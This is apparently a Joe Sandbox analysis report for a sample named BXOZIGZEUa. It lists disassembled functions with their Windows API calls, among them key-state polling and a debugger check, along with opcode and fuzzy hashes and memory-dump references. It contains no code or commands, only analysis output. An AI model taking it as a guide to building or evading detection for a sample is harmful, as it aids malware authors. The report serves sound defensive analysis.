API ID: MessageState$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
String ID:
API String ID: 2390574533-0
Opcode ID: 5f260c0826007cb8ee4a93433d5e39f6c7e377620d74463f1a9b6ad90b8d5000
Instruction ID: 42c0622e90083757a994874da41c8080e669733ba3c1f90149a995895265d3f4
Opcode Fuzzy Hash: 5f260c0826007cb8ee4a93433d5e39f6c7e377620d74463f1a9b6ad90b8d5000
Instruction Fuzzy Hash: 9441B231B147479BE7209F20C848FAEB7B5BF50711F204928E99A572D3DBB4BE908B50

Function 00210549 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 294keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23

GetClientRect.USER32(?,?), ref: 00210674
GetAsyncKeyState.USER32(00000011), ref: 0021071A

Strings

', xrefs: 002105C5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AsyncClientLongRectStateWindow
String ID: '
API String ID: 304971295-1997036262
Opcode ID: d624a9f1a43078d50741c892e27104a88f1486de84c1f753eed06b77657986b1
Instruction ID: b8a692030a620fe58d790712f5dc669af4d85b90fdd9feaee4d57aeea4b5e90b
Opcode Fuzzy Hash: d624a9f1a43078d50741c892e27104a88f1486de84c1f753eed06b77657986b1
Instruction Fuzzy Hash: 10B18F307242069BDB299F64C5D8BFEB7E6BF64304F25012DE5069B291DBB09DE0CB80

Function 002D22DF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000,00000000), ref: 002D231E
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000,00000000), ref: 002D2347
GetACP.KERNEL32(?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000), ref: 002D235B

Strings

ACP, xrefs: 002D22EE
OCP, xrefs: 002D22FF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d4ac36c9b0ac6584b65d90ba181c057e592320aecfec6a7c8e07a2575233d55b
Instruction ID: 503ce62a2c0931ce008137d47de01a1d64a96e04ea06f5608ad1377f372031b6
Opcode Fuzzy Hash: d4ac36c9b0ac6584b65d90ba181c057e592320aecfec6a7c8e07a2575233d55b
Instruction Fuzzy Hash: BE014730225747FAEB269F10FC09FDF72A8AF14318F20809AF545E11C0EB64DE658650

Function 002BC787 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 002C3B2F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002C3B44
UnhandledExceptionFilter.KERNEL32(0030DB00), ref: 002C3B4F
GetCurrentProcess.KERNEL32(C0000409), ref: 002C3B6B
TerminateProcess.KERNEL32(00000000), ref: 002C3B72

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 07b778a9fe21aeaa62c251e58e274f9be79b67e7cfc688b649e4cd411dbc4d6d
Instruction ID: 1aa6eeb00ec8e90c5b57747e4cf3497222ea8ae51a87cb7c0a5f267c9a9a091b
Opcode Fuzzy Hash: 07b778a9fe21aeaa62c251e58e274f9be79b67e7cfc688b649e4cd411dbc4d6d
Instruction Fuzzy Hash: 0A21EEB88123459FD742DF28FCD96847BBAFB08745F60551AFA088B770EBB05A808F45

Function 001C8F07 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,00000800,00000004), ref: 001C8F54
__snwprintf_s.LIBCMT ref: 001C8F8F
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 001C8FDA

Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629

Strings

LOC, xrefs: 001C8F34

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: 3fa1185204cab5c58c337984e767e009b3e63e1f5a3a9dbe7c63cf7500c3a3b9
Instruction ID: 7b8ddde05bb8dda678126a6dbbcc8575f666109d56a0b549a2ba59419abe7665
Opcode Fuzzy Hash: 3fa1185204cab5c58c337984e767e009b3e63e1f5a3a9dbe7c63cf7500c3a3b9
Instruction Fuzzy Hash: 28218E71911218ABDF21BB64DC8AFEA77A9AF60714F5100EDB104AB0D1EF74AE50CF61

Function 001CB3FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,001CB85B,?,?,?,?,?,00000000,00000000), ref: 001CB412
GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 001CB422

Strings

FindFirstFileTransactedW, xrefs: 001CB41C
kernel32.dll, xrefs: 001CB40D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FindFirstFileTransactedW$kernel32.dll
API String ID: 1646373207-2878570079
Opcode ID: 88b34b17be86a25c436a144d9736c53e1d0ef0dedfacda14a15f9c4da8934b5d
Instruction ID: 6bce3c80b0a9db6d90c6cd477249d8a3b305d168990e3b68a303d752e93c65b0
Opcode Fuzzy Hash: 88b34b17be86a25c436a144d9736c53e1d0ef0dedfacda14a15f9c4da8934b5d
Instruction Fuzzy Hash: 09F0E23214C140F787351A4BAC89C5BBB6AFAE1F22724852FF09AD1051CB3188A0CE61

Function 0021A4EB Relevance: 4.5, APIs: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0021A508

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

IsIconic.USER32(?), ref: 0021A531
GetParent.USER32(?), ref: 0021A53E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Exception@8H_prolog3IconicThrow
String ID:
API String ID: 144390861-0
Opcode ID: d8f8e06d7c3b3067b43b73dcf165f451c03d91e5bf192ffe584fd6f9181efef6
Instruction ID: bfd9005fec1d49b431894cb108df11528b13b1f513d1e5b9d91da24c0fd3e829
Opcode Fuzzy Hash: d8f8e06d7c3b3067b43b73dcf165f451c03d91e5bf192ffe584fd6f9181efef6
Instruction Fuzzy Hash: AFF0C832719206BB8B212A72AC44A6A7A9FEFB03A07514026F80992510EF30DC609691

Function 002120D5 Relevance: 4.5, APIs: 3, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00212100
GetKeyState.USER32(00000011), ref: 00212109
GetKeyState.USER32(00000012), ref: 00212112

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 0e5cb0e2512d8cc408eded3ef4e4be26550ec8a2aa7222529a2adce9cf88b421
Instruction ID: 0363c789b718e9eb1a25aae18ba6e25b47827b0d3dfbe990a307462cb170d7f2
Opcode Fuzzy Hash: 0e5cb0e2512d8cc408eded3ef4e4be26550ec8a2aa7222529a2adce9cf88b421
Instruction Fuzzy Hash: 72F0A03526027EEAEB10E6E09D02BE07AD58B20780F148061FB4C7B043CAB0A9B586A0

Function 00214603 Relevance: 3.1, APIs: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00214657
PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 002146A7

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: IconicLongMessagePostWindow
String ID:
API String ID: 1855654840-0
Opcode ID: d2bcdb541af6a76d7a081dfc6bf2b75341341eedd24af4814191213bf2461b55
Instruction ID: 91fcf5d2cf09f3d1c8bc3b07e68cce1aafbe10f46e3ae04e96adc8f2a56edb09
Opcode Fuzzy Hash: d2bcdb541af6a76d7a081dfc6bf2b75341341eedd24af4814191213bf2461b55
Instruction Fuzzy Hash: CB11A173270B824FD738AE38DD85BE672DAEB76318F180A2AE05DC61D1D764DCA08610

Function 0020814E Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00208162
IsIconic.USER32(?), ref: 00208174

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: b50bf04fdc4903a29d90d0c8bd2aedf4de360faf78661a70955876909d70bcda
Instruction ID: e35ea8e2ac448caed65b7d240a0961f8567766ee3660e8434922772dcad69662
Opcode Fuzzy Hash: b50bf04fdc4903a29d90d0c8bd2aedf4de360faf78661a70955876909d70bcda
Instruction Fuzzy Hash: 3AF0893332071577CB311A2A9C4991FF66E9FD2B70714032AF5AD925F2EE709C638594

Function 001CD36B Relevance: 3.0, APIs: 2, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001CD399
CoCreateInstance.OLE32(00311F68,00000000,00000001,002E987C,003332AC,-0000043C,?,?,001DF56F,00000000,?,00215930), ref: 001CD3B7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateInitializeInstance
String ID:
API String ID: 3519745914-0
Opcode ID: 8e0093ceed7cd4512392f7da3f0d35acda900e3e849706cd76393a3ed4940e64
Instruction ID: 45f86d57ded8fdb2bf0a0c9975a7d7cba6d1514d759e3b18e26b713c4aa811ae
Opcode Fuzzy Hash: 8e0093ceed7cd4512392f7da3f0d35acda900e3e849706cd76393a3ed4940e64
Instruction Fuzzy Hash: 7FF05EB5680281ABD7209E51BCC8FE677A5FBE4305F64243DE245AA141C772A882CB52

Function 001E0624 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

SetForegroundWindow.USER32(?), ref: 001E0651
IsIconic.USER32(?), ref: 001E065A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ForegroundIconicWindow
String ID:
API String ID: 1248896474-0
Opcode ID: 8836623d4dffddc1aef405bd2f15991f040b4fc750693d0940bdf49e4b94a367
Instruction ID: bac954dd1d5095682e1fc199c7e2e28c702725ae5a251b55fce2215000082951
Opcode Fuzzy Hash: 8836623d4dffddc1aef405bd2f15991f040b4fc750693d0940bdf49e4b94a367
Instruction Fuzzy Hash: 1AE023322449905BD6312765BC49F2E7A75EFDC731B15026AF4598A1F1DF60CC518750

Function 001E06C8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 001E06E8

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: db1caf6595ddf380ca640c0258b2aa97ca57cb124d2641d96d16bdf08b47b39b
Instruction ID: 596bec179b5f8b9c82b14f0467ce187a9eec105d0b16990ab7f6270fba4ccd27
Opcode Fuzzy Hash: db1caf6595ddf380ca640c0258b2aa97ca57cb124d2641d96d16bdf08b47b39b
Instruction Fuzzy Hash: CFE0DF323AC9416AD7266A39BC86E3B2ADAEBD8B21B14022DF45AC25D0DF50DC028610

Function 002BE120 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 39ec02ae6bc94b89ff85b9336ceec202f637bfa0c7692a9472b458cbc0d7ef22
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 011138B723104383DE148E3DC8B46F7A396EAC53A0B3F836AC0498B758D232AD61A500

Function 00237335 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 323fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0023733F
GetModuleFileNameW.KERNEL32(00000000,002062A3,00000104,?,00000A90,002378F3,?,00000000,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9), ref: 002373EE
__wsplitpath_s.LIBCMT ref: 0023741A
__wsplitpath_s.LIBCMT ref: 00237439
__wmakepath_s.LIBCMT ref: 00237466
_wcslen.LIBCMT ref: 00237472
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000A90,002378F3,?,00000000,00000084,00237D9A,0000000A,0000000A), ref: 002374AA

Strings

, xrefs: 002377E6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: File__wsplitpath_s$CreateH_prolog3_ModuleName__wmakepath_s_wcslen
String ID:
API String ID: 1221639053-3916222277
Opcode ID: a94b123d75eb9b85c360c3d77a036f74d4a911d21d7bd8a78c34a8516a7605f2
Instruction ID: d2b296da84d1495d083e5cca6b50ca728ab19722411509e125518618154d3971
Opcode Fuzzy Hash: a94b123d75eb9b85c360c3d77a036f74d4a911d21d7bd8a78c34a8516a7605f2
Instruction Fuzzy Hash: 64D128B1A10329AFCF21AF60CD85BADBB79BB1A314F1004E9F50AA2551DB705F94DF12

Function 001FA64D Relevance: 49.9, APIs: 33, Instructions: 446COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FA68C
PtInRect.USER32(?,?,?), ref: 001FA6A2
GetClientRect.USER32(?,?), ref: 001FA6BF
PtInRect.USER32(?,?,?), ref: 001FA6DA
GetSystemMetrics.USER32(0000000D), ref: 001FA706
GetSystemMetrics.USER32(0000000E), ref: 001FA711
PtInRect.USER32(?,?,?), ref: 001FA755

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$MetricsSystem$ClientWindow
String ID:
API String ID: 2286436557-0
Opcode ID: 02ed02dae9636a56f27b52a3ef70d577ede6de7eff76cf6a79ba183c0e8fb256
Instruction ID: 806f6d77f0f6065f78c72b2625c1de55543de81ef3c8007fef91bac88e5be9ed
Opcode Fuzzy Hash: 02ed02dae9636a56f27b52a3ef70d577ede6de7eff76cf6a79ba183c0e8fb256
Instruction Fuzzy Hash: 47F1E7B1A0020EAFDF05DFA4CD84DEEBBB9AF48344F104529E619E7250DB35EA05CB61

Function 001EACA7 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 457keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001EACAE
GetParent.USER32(?), ref: 001EAD09
GetParent.USER32(?), ref: 001EAD25
UpdateWindow.USER32(?), ref: 001EAD6D
SetCursor.USER32(?,00000000), ref: 001EAD92
GetAsyncKeyState.USER32(00000012), ref: 001EADF4
UpdateWindow.USER32(?), ref: 001EAEFA
InflateRect.USER32(?,00000002,00000002), ref: 001EAF5A
SetCapture.USER32(?), ref: 001EAF63
SetCursor.USER32(00000000), ref: 001EAF7B
IsWindow.USER32(?), ref: 001EB019
GetCursorPos.USER32(?), ref: 001EB058
ScreenToClient.USER32(?,?), ref: 001EB065
PtInRect.USER32(?,?,?), ref: 001EB081
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 001EB0F5
GetParent.USER32(?), ref: 001EB110
GetParent.USER32(?), ref: 001EB124
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,?,?,?,?,?,?,00000000), ref: 001EB136
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 001EB158
GetParent.USER32(?), ref: 001EB161
GetParent.USER32(?), ref: 001EB17C
GetParent.USER32(?), ref: 001EB187
InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 001EB1BF
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 001EB2F7

